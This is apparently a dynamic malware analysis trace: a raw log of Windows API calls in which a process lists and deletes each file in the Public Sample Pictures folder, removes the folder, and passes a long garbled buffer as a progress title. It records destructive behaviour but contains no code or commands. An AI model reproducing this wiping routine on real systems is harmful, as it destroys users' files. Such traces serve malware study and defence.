hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="Chrysanthemum.jpg", cAlternateFileName="CHRYSA~1.JPG")) returned 1 [0268.089] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg")) returned 1 [0268.095] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xce875, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="Desert.jpg", cAlternateFileName="")) returned 1 [0268.095] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg")) returned 1 [0268.096] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0268.096] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini")) returned 1 [0268.098] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x91554, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="Hydrangeas.jpg", cAlternateFileName="HYDRAN~1.JPG")) returned 1 [0268.098] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg")) returned 1 [0268.098] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbd616, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="Jellyfish.jpg", cAlternateFileName="JELLYF~1.JPG")) returned 1 [0268.098] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg")) returned 1 [0268.100] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbea1f, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="Koala.jpg", cAlternateFileName="")) returned 1 [0268.100] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg")) returned 1 [0268.100] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8907c, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="Lighthouse.jpg", cAlternateFileName="LIGHTH~1.JPG")) returned 1 [0268.100] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg")) returned 1 [0268.102] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbde6b, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="Penguins.jpg", cAlternateFileName="")) returned 1 [0268.102] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg")) returned 1 [0268.103] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x97958, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="Tulips.jpg", cAlternateFileName="")) returned 1 [0268.103] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg")) returned 1 [0268.103] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x97958, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="Tulips.jpg", cAlternateFileName="")) returned 0 [0268.103] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0268.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0268.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0268.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0268.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0268.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0268.104] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0268.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0268.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0268.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0268.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0268.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0268.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0268.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0268.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0268.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0268.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0268.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0268.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0268.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0268.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0268.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0268.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0268.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0268.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0268.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0268.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0268.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0268.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0268.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0268.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0268.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0268.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0268.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0268.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0268.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x52) returned 0x249a7e0 [0268.105] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures/Sample Pictures", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures", lpFilePart=0x8bf658*="Sample Pictures") returned 0x28 [0268.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249a7e0 | out: hHeap=0x25c0000) returned 1 [0268.106] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures" (normalized: "c:\\users\\public\\pictures\\sample pictures")) returned 0x11 [0268.106] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\Public\\Pictures\\Sample Pictures", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\